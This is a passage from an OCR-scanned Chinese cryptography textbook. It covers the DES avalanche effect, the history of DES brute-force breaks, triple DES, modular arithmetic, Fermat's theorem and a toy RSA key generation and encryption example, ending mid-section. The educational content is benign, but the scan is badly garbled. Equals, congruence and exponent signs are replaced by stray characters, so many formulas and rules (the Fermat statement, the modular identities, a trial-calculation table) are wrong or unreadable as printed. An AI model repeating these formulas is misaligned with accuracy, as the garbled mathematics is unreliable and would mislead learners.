ci 一 0101110110011011000100111100110110100110001011110110100000101110， 

cz 一 0010000010011000010101000011000000110001100110110100011110101000 。 

两 者 的 汉 明 距离 为 36 ,说 明 64 位 中 有 36 位 不 同 。 也 就 是 说 ,用 同样 密 钥 加 密 只 差 1 位 
的 两 个 明文 , 密 文 相差 36 位 ,变化 比率 为 56%。 

(2) 用 只 差 一 比特 的 两 个 密 钥 加 密 同 样 明 文 。 例 如 key 一 12345678 ,key: 一 12345677， 
pi=hellodes。 

ci 一 0011001011001010110010100111100110010001001010101001101111101110 

cz 一 0110000011011001111110000000000101111001011011000010011001000011 

两 者 的 汉 明 距离 为 31 ,说明 用 只 差 一 比特 的 两 个 密 钥 加 密 同 样 的 明文 , 密 文 相差 31 位 ， 
变化 比率 为 48%。 

3. DES 解密 

DES 的 算法 是 对 称 的 , 既 可 用 于 加 密 又 可 用 于 解密 ,具有 一 个 非常 有 用 的 性 质 ; 加 密 和 
解密 可 使 用 相同 的 算法 。 

DES 使 得 能 够 用 相同 的 函数 来 加 密 或 解密 每 个 分 组 ,二 者 唯一 不 同 之 处 是 密 钥 的 次 序 
相反 ,算法 本 身 并 没有 任何 变化 。 这 就 是 说 ,如 果 各 轮 的 加 密 密 钥 分 别 是 KK,K;，,…, Ke， 
那么 解密 密 钥 就 是 Kis ,Kis ,Kis，… ,Ki。 为 各 轮 产生 密 钥 的 算法 也 是 循环 的 。 密 钥 向 右 移 
动 ,每 次 移动 的 个 数 为 0,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1。 这 使 得 DES 硬件 加 密 、 解 密 
可 以 使 用 同一 硬件 设备 , 极 大 地 降低 了 硬件 制造 成 本 。 


2.2.2 DES 算法 的 优 缺 点 


DES 算法 的 优点 是 加 解密 速度 快 ,具有 比较 高 的 安全 性 ,目前 还 没有 发 现 这 种 算法 在 
设计 上 的 破绽 ,在 理论 上 DES 算法 仍然 是 不 可 解 的 。 实 践 中 ,对 于 DES 算法 都 是 通过 穷 举 
密 钥 的 方式 破解 的 ,56 位 长 的 密 钥 的 穷 举 空间 为 2*, 这 意味 着 如 果 一 台 计 算 机 的 速度 是 每 
一 秒 钟 检测 一 百 万 个 密 钥 , 则 它 搜索 完全 部 密 钥 就 需要 将 近 2285 年 的 时 间 , 可 见 这 是 难以 
实现 的 。 但 随 着 计算 能 力 的 增强 ,DES 解密 所 需 时 间 越 来 越 短 ,安全 性 日 益 受 到 挑战 。 

1997 年 1 月 28 日 ,美国 RSA 数据 安全 公司 开展 了 一 项 名 为 秘密 密 钥 挑 战 (Secret Key 
Challenge) 的 竞赛 ,悬赏 10 000 美元 破解 一 段 DES 密 文 。RSA 发 起 此 次 活动 旨 在 测试 
DES 算法 的 安全 强度 。 美 国 科罗拉多 州 的 程序 员 Rocke Verser 设计 了 一 个 通过 Internet 分 段 
运行 的 密 钥 搜索 程序 ,采用 穷 举 密 钥 的 方式 对 DES 进行 破解 。 搜 索 行动 被 称 为 DESCHALL， 
成 千 上 万 的 志愿 者 加 入 到 计划 中 ,每 个 加 入 的 志愿 者 会 被 分 配 一 部 分 密 钥 空间 进行 测试 。 破 
解 活动 从 1997 年 3 月 13 日 开始 ,在 1997 年 6 月 17 日 ,也 就 是 破解 活动 的 第 96 天 ,美国 盐湖 
城 一 个 公司 职员 Michael Sanders 成 功 地 找到 了 密 钥 ,解密 出 了 明文 :“Strong cryptography 
makes the world a safer place( 高 强度 的 密码 技术 使 世界 更 安全 )”。 此 次 破解 一 方面 说 明 DES 
算法 绝 非 坚不可摧 , 另 一 方面 也 显示 了 Internet 上 分 布 式 计 算 的 强大 能 力 。 

1998 年 电子 前 线 基金 会 (Electronic Frontier Foundation ,EFF) 为 了 告诫 政府 DES 的 
保密 性 只 是 在 一 定 范 围 内 ,花费 了 25 万 美元 制造 了 一 台 专 用 于 暴力 破解 DES 算法 的 计算 
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机 ,这 台 计 算 机 被 命名 为 DES 深层 破解 (Deep Crack) 。1998 年 7 月 13 日 早上 9 点 ,计算 机 
开始 破解 了 一 段 DES 密 文 ,在 7 月 15 日 下 午 5 点 成 功 找到 DES 密 钥 ,一 共 只 花费 来 了 
56 小 时 。1999 年 ,EFF 用 22 小 时 15 分 就 完成 了 一 段 DES 密 文 的 破解 工作 。 

DES 算法 的 缺点 是 : 

(1) DES 算法 中 只 用 到 64 位 密 钥 中 的 56 位 ,而 第 8,16,24,…,64 位 8 个 位 并 未 参与 
DES 算法 ,这 一 点 提出 了 一 个 应 用 上 的 要 求 , 即 DES 的 安全 性 基于 除了 8,16,24,…,64 位 
外 的 其 余 56 位 的 组 合 变化 2” 才 得 以 保证 的 。 因 此 ,在 实际 应 用 中 ,应 避 开 使 用 第 8,16， 
24,…,64 位 作为 有 效 数据 位 ,而 使 用 其 他 的 56 位 作为 有 效 数据 位 ,才能 保证 DES 算法 安 
全 可 靠 地 发 挥 作用 。 如 果 不 了 解 这 一 点 ,把 密 钥 Key 的 8,16,24,…,64 位 作为 有 效 数据 使 
用 ,将 不 能 保证 DES 加 密 数 据 的 安全 性 ,对 应 用 DES 来 达到 保密 作用 的 系统 产生 数据 破译 
的 危险 ,这 正 是 DES 算法 在 应 用 上 的 误区 , 留 下 了 被 人 攻击 、 破 译 的 极 大 隐患 。 

(2) DES 的 唯一 密码 学 缺点 就 是 密 钥 长 度 较 短 。 解 决 密 钥 长 度 问 题 的 办 法 之 一 是 采用 
三 重 DES。 

三 重 DES 方法 需要 执行 3 次 常规 的 DES 加 密 步骤 ,但 最 常用 的 三 重 DES 算法 中 仅仅 
用 两 个 56 位 DES 密 钥 。 设 这 两 个 密 钥 为 K! 和 K, ,其 算法 的 步骤 如 下 : 

。 用 密 钥 K, 进行 DES 加 密 ; 

。 对 上 面 的 结果 使 用 密 钥 K, 进行 DES 解密 ( 实 为 加 密 , 因 为 密 钥 不 同 ) ; 

。 对 上 一 步 的 结果 使 用 人 进行 DES 加 密 。 

这 个 过 程 称 为 EDE, 因 为 它 是 由 加 密 一 解密 一 加 密 步 又 组 成 的 。 

在 EDE 中 ,中 间 步 骤 是 解密 ,所 以 ,可 以 使 用 两 个 密 钥 K， 和 K。 执行 常规 的 DES 加 
密 、 解 密实 现 三 重 DES。 

三 重 DES 的 缺点 是 时 间 开 销 较 大 ,三 重 DES 的 时 间 是 DES 算法 的 3 倍 。 但 从 另 一 方 
面 看 ,三 重 DES 的 112 位 密 钥 长 度 在 可 以 预见 的 将 来 可 认为 是 合适 的 。 

(3) 存在 密 钥 分 发 难题 。 对 称 密 钥 算法 的 优点 是 加 解密 速度 快 ,因而 适合 用 作 大 量 数 
据 的 加 解密 ; 缺点 是 发 送 者 和 接收 者 在 安全 通信 之 前 必须 先 协商 一 个 密 钥 ,存在 密码 分 发 
问题 ,信息 泄密 后 不 能 区 分 责任 者 。 这 是 由 于 加 密 密 码 和 解密 密 钥 相同 , 且 发 送 方 A、 接 收 
方 B 拥 有 同一 个 密码 。 所 以 当 一 个 密 文 被 破解 后 ,无 法 确定 是 A 还 是 B 泄露 了 密 钥 。 

对 称 密 钥 分 发 问题 具体 包括 : 

。 密 钥 分 发 效率 问题 。 一 个 nn 个 人 构成 的 组 织 ,为 了 保证 两 两 间 能 够 相互 保密 通信 ， 
需要 nnX (n 一 1)/2 个 密 钥 , 即 密码 空间 为 n? 量 级 。 显 然 这 会 导致 密码 空间 爆炸 ,不 
利于 普遍 推广 使 用 。 

。 密 钥 分 发 路 径 问 题 。 线 下 分 发 (如 使 用 器 盾 ) 需 要 当面 交付 ,时 效 性 较 差 ; 线 上 分 
发 ,第 三 方 能 够 轻易 获得 对 称 密码 从 而 使 DES 加 密 失去 意义 。 

为 了 彻底 解决 以 上 问题 ,产生 了 以 RSA 为 代表 的 公 钥 密码 。 


2.3 RSA 公 钥 密码 


1976 年 ,Diffie 和 Hellman 在 “密码 学 的 新 方向 ”一 文中 提出 了 公 钥 密码 的 思想 : 密码 
系统 中 的 加 密 密 钥 和 解密 密 钥 可 以 不 同 。 由 于 不 能 容易 地 通过 加 密 密 钥 和 密 文 来 求 得 解密 
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密 钥 或 明文 ,所 以 可 以 公开 这 种 系统 的 加 密 算法 和 加 密 密 钥 ,此 时 ,用 户 只 要 保管 好 自己 的 
解密 密 钥 即 可 。 

非 对 称 密码 体制 的 优点 是 可 以 适应 网 络 的 开放 性 要 求 , 密 钥 管 理 相对 简单 ,尤其 是 可 以 
实现 数字 签名 功能 。 与 对 称 密码 算法 相 比 , 非 对 称 密码 算法 一 般 比 较 复 杂 , 加 、 解 密 速度 慢 。 

非 对 称 密码 体制 问世 以 来 ,密码 学 家 们 提出 了 许多 种 非 对 称 密码 算法 ,它们 的 安全 性 大 
都 基于 复杂 的 数学 难题 。 根 据 所 基于 的 数学 难题 来 分 类 ,只 有 大 数 因子 分 解 系统 (代表 算法 
RSA)、 离 散 对 数 系 统 ( 代 表 算 法 EIGamal)、 椭 圆 曲 线 密码 系统 (Elliptic Curve 
Cryptography,ECC)3 类 系统 目前 被 认为 是 安全 和 有 效 的 。 

RSA 算法 是 迄今 为 止 最 容易 理解 和 实现 的 公开 密 钥 算法 (Public Key Algorithm) ,是 
第 一 个 实用 的 公 钥 加 密 方案 ,同时 也 是 历史 上 最 成 功 的 ,直到 现在 仍 有 广泛 应 用 的 公 钥 加 密 
体制 ,已 经 受 住 了 多 年 深入 的 攻击 ,其 理论 基础 是 一 种 特殊 的 可 逆 模 宕 运算 ,其 安全 性 基于 
分 解 大 整数 的 困难 性 ,但 安全 性 一 直 未 能 得 到 理论 上 的 证 明 。 

RSA 算法 的 基本 原理 是 : 由 一 个 密 钥 进行 加 密 的 信息 内 容 , 只 能 由 与 之 配对 的 另 一 个 
密 钥 才能 进行 解密 。 公 和 钥 可 以 广泛 地 发 给 与 自己 有 关 的 通信 者 , 私 钥 则 需要 十 分 安全 地 存 
放 起 来 。 规 定 加 密 密 钥 叫做 公开 密 钥 (public key) ,解密 密 钥 叫做 私人 密 钥 (private key) 。 


2.3.1 模 运 算 


定义 : 给 定 一 个 正 整 数 户 ,任意 一 个 整数 2 ,一定 存 在 等 式 2 一 &AXzb 十 ,其 中 性 是 整 
数 , 且 0 三 r 二 p, 称 为 n 除 以 p 的 商 ,r 为 n 除 以 p 的 余数 。 

p 对 于 正 整 数 和 整数 a 、5, 定 义 如 下 运算 : 

(1) 取 模 运算 : a mod p ,表示 a 除 以 p 的 余数 。 

模 运 算是 整数 运算 ,有 一 个 整数 a, 以 p 为 模 做 模 运算 , 即 a mod p。 运 算是 让 a 去 被 p 
整除 ,只 取 所 得 的 余数 作为 结果 ,这 就 叫做 模 运 算 。 例 如 10 mod 3==1; 26 mod 6 二 2 等 。 

(2) 同 余 式 : 正 整数 a、.b 对 pp 取 模 ,它们 的 余数 相同 , 记 作 a 三 5 mod 或 者 a 二 
b (mod p)。 公式 中 寺 符 号 的 左边 必须 和 符号 右边 同 余 , 也 就 是 两 边 模 运算 结果 相同 。 

(3) 模 p 加 法 : (a 十 6) mod p ,结果 是 a 十 b 算术 和 除 以 p 的 余数 ,也 就 是 说 ,Ca 十 站 一 
kXp tr, 则 (a+b) mod p=r。 

(4) 模 p 减 法 : (a 一 5) mod p, 其 结果 是 a 一 5b 算术 差 除 以 p 的 余数 。 

(5) 模 p 乘法 : (aXb) mod p ,其 结果 是 a Xb 算术 乘法 除 以 p 的 余数 。 

(6) 模 指 数 运算 就 是 先 做 指数 运算 , 取 其 结果 青 做 模 运算 。 如 5 (mod 7) 二 125 mod 7 一 6。 

(7) n mod p 得 到 结果 的 正 负 由 被 除数 决定 ,与 p 无 关 。 例 如 ,7 mod 4 二 3, 一 7 
mod 4 二 一 3( 商 为 一 1)。 

注意 ”对 于 任何 同 号 的 两 个 整数 ,其 取 余 结果 没有 争议 ,所 有 语言 的 运算 原则 都 是 使 商 
尽 可 能 小 ; 对 于 异 号 的 两 个 整数 ,C++/Java 语言 的 原则 是 使 商 尽 可 能 大 ,很 多 新 型 语言 
网 页 计算 器 的 原则 是 使 商 尽 可 能 小 。 本 书 使 用 前 者 。 

基本 性 质 

(1) 若 pl(e 一 0), 则 omod p)。 例如 11 夺 4 (mod 7), 18 二 4(mod 7)。 

(2) (a mod p) 二 (5 mod p) 意 味 a 三 b (mod p)。 

(3) 对 称 性 : a 三 6 (mod p) 等 价 于 5 三 a (mod p)。 
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(4) 传递 性 : 车 4 三 b (mod p) 且 0=c (mod p), 则 a 圭 c (mod p)。 
运算 规则 

模 运算 与 基本 四 则 运算 有 些 相 似 , 但 是 除法 例外 。 其 规则 如 下 : 
(a 十 0) modp= (amodpi+bmodp)modp 








(a b) modp (amodp— bmodp)modp 

(aXb)modp= (amodp Xbmodp)modp 

(a) mod p= ((a mod p)’) modp 

结合 律 

((atb) mod pe) modp= (Ca 十 (0 十 c) mod p) modp 

((aXb) mod pX mod p= (aXbXce) mod p//(a mod pX)mod p=(aXb) modp 

交换 律 

(a 十 0) modp= (bta) modp 

(axXb) mod p= (bXa) modp 

分 配 律 

((a tb)mod pXce) mod p= ((aXc) mod pi (bXce) mod p) modp 

重要 定理 

车 4 三 b (mod p), 则 对 于 任意 的 c, 都 有 (a 十 c) 志 (4 十 c) (mod p) 

车 a 三 5 (mod p), 则 对 于 任意 的 c, 都 有 (aXce) 三 (0Xc) (mod p) 

车 4a 三 b (mod p),c 三 d (mod p), 则 (a 二 Tc) 二 (0 十 d) (mod p),(a—ce) = (0 一 d) 
(mod p) 

(aXce) = (bXd) (mod p) 

等 价 类 

模 运 算是 一 种 哈 希 函数 ,余数 不 唯一 。 对 每 个 给 定 的 模 数 mx 和 整数 a ,可 能 同时 存在 无 
限 多 个 有 效 的 余数 ,这 些 整数 的 集合 称 为 等 价 类 。 

对 a 二 12,m 二 9 的 而 言 

模 数 为 9, 余数 为 0 的 等 价 类 为 : 

模 数 为 9, 余 数 为 1 的 等 价 类 为 : 

模 数 为 9, 余 数 为 2 的 等 价 类 为 : 

模 数 为 9, 余数 为 3 的 等 价 类 为 : 

模 数 为 9, 余 数 为 8 的 等 价 类 : {…, 一 19, 一 10, 一 1, 8, 17, 26, 35, …}。 

等 价 类 中 所 有 成 员 的 行为 等 价 : 对 于 一 个 给 定 模 数 ,选择 等 价 类 中 任何 一 个 元 素 用 
于 计算 的 结果 都 是 一 样 的 。 因 此 在 固定 模 数 的 计算 中 (这 是 密码 学 中 最 常见 的 情况 ) ,我 们 
可 以 选择 等 价 类 中 最 易于 计算 的 一 个 元 素 。 

例如 计算 3:mod 7, 直 接 计 算 为 3: 二 6561 寺 2 mod 7, 因 为 6561 二 937X7 十 2。 这 个 计 
算 中 ,尽管 我 们 已 经 知道 最 后 的 结果 不 会 大 于 6, 但 还 是 会 用 到 相当 大 的 中 间 结 果 6561。 更 
加 巧妙 的 方法 是 首先 执行 两 个 部 分 指数 运算 : 3 二 3: X 3 二 81 X 81; 然后 将 中 间 结 果 
81 替换 为 同一 等 价 类 中 的 其 他 元 素 。 在 模 数 7 的 等 价 类 中 ,最 小 的 正 元 素 是 4( 由 于 81= 
11X7 十 4) ,所 以 3 一 81X81 二 4X4 二 16 mod 7 二 2 mod 7 。 计 算 过 程 为 : 


“05 —27> 一 18， 一 9， 0, 9, 18, 275°%}3 
ss 05 17 —8 ls 10, 95 285°0)y 
25 一 16 —7,2, ly 20。 29%°°)s 
“0 一 24， 一 15， 一 6，3，12，21，30，…)5 
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名 EE 81 X 81 4X4 16 mod 7 三 2 mod 7 

此 时 计算 可 以 不 使 用 计算 器 ,因为 它 所 涉及 的 所 有 数字 都 不 会 大 于 81。 而 第 一 种 方法 
中 计算 6561 除 以 7 就 已 经 具有 一 定 的 挑战 性 。 

我 们 必须 牢记 的 通用 规则 就 是 : 应 该 尽早 使 用 模 约 简 , 使 计算 的 数值 尽 可 能 小 ,这 样 做 总 
是 极 具 计算 优势 。 当 然 ,不 管 在 等 价 类 中 怎么 切换 ,任何 模 数 计算 的 最 终结 果 都 是 相同 的 。 

同 余 式 的 存在 说 明 : y= 二 x mod 户 ,对 于 同一 个 y,z 的 取 值 范围 是 等 价 类 集合 ,不 具有 
唯一 性 ,因此 > 与 x 的 对 应 关系 是 1 对 的 关系 ,由 工 计 算 > 是 唯一 确定 的 ,而 由 y 推断 zx 
是 不 确定 的 ,不 具有 唯一 性 。 这 正 是 密码 学 中 大 量 使 用 模 运 算 的 原因 所 在 。 

费 马 定理 : 若 p 是 素数 ,a 是 正 整 数 且 不 能 被 p 整除 , 则 : a%*7? 了 mod p= 二 1 mod p。 

推论 : 若 p 是 素数 ,a 是 正 整 数 且 不 能 被 p 整除 , 则 : a* mod p==a mod p。 

要 求 a/c mod p, 当 c 与 p 互 质 时 ,使 用 费 马 定理 可 得 : 

a/cmodp=a/cmodpXl1l= a/cmodpXcr Vmodp=axXcr modp 

例如 ,13X14? mod 11 =((13 mod 11)X(14 mod 11)’) mod 11 一 (2X3?) mod 11= 
(2/3)mod 11=8。 








2.3.2 RSA 算法 


RSA 算法 就 是 找 两 个 很 大 的 素数 : 一 个 公开 给 所 有 人 , 称 之 为 公 钥 ; 另 一 个 不 告诉 任 
何人 , 称 之 为 私 钥 。 两 把 密 钥 互补 一 一 用 公 钥 加 密 的 密 文 可 以 用 私 钥 解 密 , 反 过 来 也 一 样 。 

这 里 特别 强调 , 私 钥 不 允许 告诉 任何 人 ,也 就 是 具有 唯一 性 。 计 算 机 产生 私 钥 后 只 需 存 
储 于 本 地 ,不 能 也 不 需要 在 网 上 传输 ,从 而 保证 了 其 唯一 保密 性 。 

RSA 算法 如 图 2-7 所 示 。 

































































求 n=pxg 
明文 M 
| 求 hoDF=-D(9-D 
证 CNye | 找 与 求 $(m) 互 质 的 数 e， 
加 密 C=M*(mod n) 且 1<e< 求 ¢(n) 
| 
Fe 计算 4, 使 得 
解密 M=C%mod de=1 mod ¢(n) 
图 2-7 算法 流程 


(1) 选择 一 对 不 同 的 ,足够 大 的 素数 p 和 g( 目 前 两 个 数 的 长 度 都 接近 512bit 被 认为 是 安 
全 的 )。 

(2) 计算 n=pXg。 

(3) 计算 欧 拉 函数 $n) 二 (pp 一 1)(g 一 1) ,同时 对 pg 严 加 保密 ,不 让 任何 人 知道 。 

(4) 找 一 个 与 %z) 互 质 的 数 e, 且 1 天 e 一 gz) 。 

(5) 计算 d, 使 得 dXe 寺 1 mod %(2) 。 这 个 公式 也 可 以 表达 为 d 三 e 一 1 mod $Cn) , 显 
而 易 见 ,不 管 %(z) 取 什么 值 , 符 号 右边 1 mod $(n) 的 结果 都 等 于 1; 符号 的 左边 4 与 e 的 乘 
积 做 模 运 算 后 的 结果 也 必须 等 于 1。 这 就 需要 计算 出 d 的 值 ,让 这 个 同 余 等 式 能 够 成 立 。 
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(6) 公 钥 Km 一 (e,z), 私 钥 Ky 二 (d,n)。 

(7) 加 密 过 程 为 : C 寺 Mr (mod n) (M 为 待 加 密 的 明文 ) 。 加 密 时 , 先 将 明文 变换 成 0 至 
2 一 1 的 一 个 整数 M。 若 明文 较 长 ,可 先 分 制 成 适当 的 组 ,然后 再 进行 交换 。 

(8) 解密 过 程 为 : M 圭 C*(mod n) 二 (MM)* mod 2 一 M2 mod n(C 为 待 解密 的 密 文 )。 

RSA 遭受 攻击 的 很 多 情况 是 因为 算法 实现 的 一 些 细节 上 的 漏洞 所 导致 的 ,所 以 在 使 用 
RSA 算法 构造 密码 系统 时 ,为 保证 安全 ,在 生成 大 素数 的 基础 上 ,还 必须 认真 仔细 选择 参 
数 ,防止 漏洞 的 形成 。 根 据 RSA 加 解密 过 程 , 其 主要 参数 有 3 个 : 模 数 ”加 密 密 钥 ,解密 
密 钥 d。 

1) 模 数 的 确定 

(1) p 和 g 之 差 要 大 ( 当 p 和 g 相差 很 小 时 ,在 已 知 的 情况 下 ,可 假定 二 者 的 平均 值 为 
n, 然 后 利用 等 式 右 边 开 方 则 得 到 nn, 即 被 分 解 )。 

(2) p 一 1 和 g 一 1 的 最 大 公 因 子 应 很 小 。 

(3) p 和 g 必须 为 强 素数 。 

2) 参数 e 的 选取 原则 

在 RSA 算法 中 ,e 和 互 质 的 条 件 容 易 满 足 , 如 果 选 择 较 小 的 e, 则 加 、 解 密 的 速度 加 快 ， 
也 便于 存储 ,但 会 导致 安全 问题 。 

一 般 地 ,e 的 选取 有 如 下 原则 : 

(1) e 不 能 够 太 小 。 一 般 选 择 e 为 16 位 的 素数 。 

(2) e 应 选择 使 其 在 mod %(z) 的 阶 为 最 大 。 即 存在 i, 使 得 e' 寺 1 mod $2),i 宇 (p 一 1) X 
(g 一 1)/2 可 以 有 效 抗击 攻击 。 

3) d 选取 原则 

一 般 地 ,私密 密 钥 d 要 大 于 n+ 。 在 许多 应 用 场合 , 常 希望 使 用 位 数 较 短 的 密 钥 以 降低 
解密 或 签名 的 时 间 。 例 如 ,在 IC 卡 应 用 中 ,IC 卡 CPU 的 计算 能 力 远 低 于 计算 机 主机 。 长 
度 较 短 的 d 可 以 减少 IC 卡 的 解密 或 签名 时 间 ,而 让 较 复 杂 的 加 密 或 验证 预算 (e 长 度 较 长 ) 
由 快速 的 计算 机 主机 运行 。 一 个 直接 的 问题 就 是 : 解密 密 钥 d 的 长 度 减 少 是 否 会 造成 安全 
性 的 降低 ? 很 明显 地 ,车 d 的 长 度 太 小 , 则 可 以 利用 已 知 明文 M 加 密 后 得 C=M* mod n, 再 
直接 猜测 d, 求 出 C? mod n 是 否 等 于 M。 若 是 , 则 猜测 正确 ,否则 继续 猜测 。 若 d 的 长 度 过 
小 , 则 猜测 的 空间 变 小 , 猜 中 的 可 能 性 加 大 ,已 有 证 明 当 d 一刀 时 ,可 以 由 连 分 式 算法 在 多 项 
式 时 间 内 求 出 d 值 。 因 此 其 长 度 不 能 过 小 。 

【 例 2-18】 使 用 RSA 算法 实现 用 户 A 将 明文 “key” 加 密 后 传递 给 用 户 B。 

解 : (1) 计算 公私 密 钥 (e,n) 和 (d,n)。 令 p= 二 3,g 二 11, 得 出 n= 一 pXg=3X11= 33; 
$7) 二 (jp 一 1)(g 一 1) 一 2X10 二 20; 取 e 二 3,(3 与 20 互 质 ) 则 eXxd 二 1 mod $(n), 即 3Xd 二 
1 mod 20。d 怎样 取 值 呢 ? 可 以 用 试 算 的 办 法 来 寻找 ,结果 如 表 2-13 所 示 。 


表 2-13 3Xd=1 mod 20 试 算 结 果 























d eXd 一 3Xd (eXd)mod(p—1)(g—1)=(3Xd) mod 20 
1 3 3 
2 6 6 
3 9 9 
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续 表 
d eXd 一 3Xd (eXd)mod(p—1)(g—1)=(3Xd) mod 20 
4 12 12 
5 15 15 
6 18 18 
7 21 1 
8 24 3 
Ed 27 6 








通过 试 算 可 知 , 当 d=7 时 ,eXd 三 1 mod $(n) 同 余 等 式 成 立 。 因 此 ,可 令 d= 二 7。 从 而 
我 们 可 以 设计 出 一 对 公私 密 钥 : 

加 密 密 钥 ( 公 钥 )kpw 二 (e,n) 二 (3,33); 解密 密 钥 ( 私 钥 )kpi 二 (d,n) 二 (7,33)。 

(2) 英文 数字 化 。 如 表 2-14 所 示 ,将 明文 信息 数字 化 ,并 将 每 块 两 个 数字 分 组 。 则 得 
到 分 组 后 的 key 的 明文 信息 为 : 11,05,25。 


表 2-14 英文 数字 化 





字母 a b 和 d e 六 g h i j k 1 m 
码 值 01 02 03 04 05 06 07 08 09 10 11 12 13 
字母 n o p q s t u v w 入 y z 
码 值 14 15 16 17 18 19 20 21 22 23 24 25 26 


(3) 明文 加 密 。 用 户 加 密 密 钥 (3,33) 将 数字 化 明文 分 组 信息 加 密 成 密 文 。 由 C 二 
Mr (mod n) 得 : 

Cl=(MLD)' (mod n)=11’ (mod 33)11 C2=(M2)"(mod n)=5’ (mod 33)=26 

C3 三 (M3)° (mod n)=25’ (mod 33) 三 16 

因此 ,得 到 相应 的 密 文 信息 为 : 11,26,16, 对 应 字符 串 为 K2P。 

(4) 密 文 解密 。 用 户 B 收 到 密 文 , 若 将 其 解密 ,只 需要 计算 M 三 C”(mod 2) , 即 : 

M1 三 (C1)’(mod n)=11’(mod 33) 王 11 M2==(C2)(mod n)=26’(mod 33)=05 

M3 三 (C3)"(mod n)=16’ (mod 33)=25 

用 户 B 得 到 明文 信息 为 : 11,05,25。 根 据 上 面 的 编码 表 将 其 转换 为 英文 ,我 们 又 得 到 
了 恢复 后 的 原文 key。 

当然 ,实际 运算 要 比 这 复杂 得 多 ,由 于 RSA 算法 的 公 钥 私 钥 的 长 度 ( 模 长 度 ) 要 到 1024 
位 甚至 2048 位 才能 保证 安全 ,因此 ,p、g、e 的 选取 , 公 钥 私 钥 的 生成 ,加 密 解 密 模 指数 运算 
都 有 一 定 的 计算 量 ,需要 使 用 计算 机 才能 高 速 完成 。 

RSA 算法 的 安全 

密码 分 析 者 攻击 RSA 体制 的 关键 点 在 于 如 何 分 解 %"。 若 分 解 成 功 使 n= pq, 则 可 以 算 
出 %(z) 一 (tb 一 1)(9q 一 1) ,然后 由 公开 的 e, 解 出 秘密 的 &。 所 以 说 RSA 算法 的 安全 性 基于 
分 解 大 整数 的 困难 性 。 

RSA 公 角 密码 系统 基于 “大 整数 分 解 " 这 一 著名 数论 难题 : 将 两 个 大 素数 相 乘 十 分 容 
易 , 但 要 将 乘积 结果 分 解 为 两 个 大 素数 因子 却 极为 困难 。 举 例 来 说 ,将 两 个 素数 11 927 和 
20 903 相 乘 ,可 以 很 容易 地 得 出 其 结果 249 310 081; 但 是 要 想 将 249 310 081 分 解 因子 得 到 
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相应 的 两 个 素数 却 极为 困难 。 

Rivest、Shamir、Adleman 提出 ,两 个 素数 的 乘积 如 果 长 度 达到 了 130 位 , 则 将 该 乘积 分 
解 为 两 个 素数 需要 花费 近 百 万 年 的 时 间 。 为 了 证 明 这 一 点 ,他 们 找到 1 个 129 位 数 ,向 世界 
挑战 找 出 它 的 两 个 因子 ,这 个 129 位 的 数 被 称 为 RSA129, 其 值 为 114 381 625 757 888 867 
669 235 779 976 146 612 010 218 296 721 242 362 562 561 842 935 706 935 245 733 897 830 
597 123 563 958 705 058 989 075 147 599 290 026 879 543 541。 世 界 各 地 600 多 名 研究 人 
员 通 过 Internet 协调 各 自 的 工作 向 这 个 129 位 数 发 起 进攻 。 花 费 了 9 个 月 的 时 间 , 终 于 分 
解 出 了 RSA129 的 两 个 素数 因子 。 两 个 素数 因子 一 个 长 为 64 位 , 另 一 个 长 为 65 位 。64 位 
的 素数 是 3 490 529 510 847 650 949 147 849 619 903 898 133 417 764 638 493 387 843 990 
820 577, 65 的 素数 是 32 769 132 993 266 709 549 961 988 190 834 461 413 177 642 967 992 
942 539 798 288 533。RSA129 虽然 没有 如 RSA 三 位 专家 预计 的 那样 花费 极 长 的 时 间 破 
解 ,但 它 的 破解 足以 说 明 两 方面 的 问题 : 一 是 大 整数 的 因子 分 解 问题 需要 高 昂 的 计算 开销 ， 
计算 不 可 行 ; 二 是 通过 Internet 让 大 量 的 普通 计算 机 协同 工作 可 以 获得 强大 的 计算 能 力 。 

RSA 的 安全 性 依赖 于 大 整数 分 解 ,但 是 否 等 同 于 大 整数 分 解 一 直 未 能 得 到 理论 上 的 证 
明 ,因为 没有 证 明 破 解 RSA 就 一 定 需要 作 大 整数 分 解 。 假 设 存在 一 种 无 须 分 解 大 数 的 算 
法 , 那 它 肯定 可 以 修改 成 为 大 整数 分 解 算法 。 目 前 ,RSA 的 一 些 变种 算法 已 被 证 明 等 价 于 
大 整数 分 解 。 

不 管 怎样 ,分 解 n 是 最 直接 的 攻击 方法 ,人 们 已 能 分 解 多 个 十 进 制 位 的 大 素数 。 因 此 ， 
模 数 n 必须 选 大 一 些 , 如 1024、2048 位 二 进 制 数 。 

由 于 进行 的 都 是 大 数 计 算 , 使 得 RSA 最 快 的 情况 也 比 DES 慢 上 数 倍 , 无 论 是 用 软件 还 
是 硬件 实现 。 速 度 一 直 是 RSA 的 缺陷 。 一 般 来 说 只 适用 于 少量 数据 加 密 。 


2.3.3 RSA 用 法 


RSA 算法 是 第 一 个 既 能 用 于 数据 加 密 也 能 用 于 数字 签名 的 算法 。 每 个 用 户 拥有 一 个 
仅 为 本 人 所 掌握 的 私 钥 , 用 它 进行 解密 和 签名 ; 同时 拥有 一 个 公 钥 用 于 文件 发 送 时 加 密 。 

1. RSA 数据 加 密 用 法 

当 发 送 一 份 保密 文件 时 ,发 送 方 使 用 接收 方 的 公 钥 对 数据 加 密 , 而 接收 方 则 使 用 自己 的 
私 钥 解 密 , 这 样 , 信 息 就 可 以 安全 无 误 地 到 达 目 的 地 了 ,即使 被 第 三 方 截获 ,由 于 没有 相应 的 
私 钥 ,也 无 法 进行 解密 。 

如 图 2-8 所 示 ,A 向 B 发 信息 ,A 需要 B 的 公 钥 。A 用 B 的 公 钥 加 密 信息 发 出 ,B 收 到 
后 用 自己 的 私 钥 解 密 还 原 出 原文 ,这 样 就 保证 了 信息 传输 的 安全 性 。 

密 文 在 传输 过 程 中 ,任何 人 都 可 以 获得 ,但 由 于 密 文 是 用 B 的 公 钥 加 密 的 ,只 有 B 的 私 
钥 能 够 解密 ,其 他 人 无 法 解密 密 文 ,因而 实现 了 信息 传输 的 机 密 性 。 

RSA 数据 加 密 的 特征 是 : 先 公 后 私 ( 发 送 方 先 用 接收 方 公 钥 加 密 信息 发 送 , 接 收 方 接 
收 加 密 信息 后 用 接收 方 私 钥 解密 )。 

错误 的 使 用 方法 是 用 发 送 方 公 钥 加 密 。 因 为 接收 方 没有 发 送 方 的 私 钥 ,无 法 解密 使 用 
发 送 方 公 钥 加 密 的 信息 ,将 导致 接收 的 加 密 信 息 无 法 使 用 。 

使 用 RSA 对 通信 的 双方 进行 信息 加 密 保护 时 ,其 实际 步骤 如 下 : 

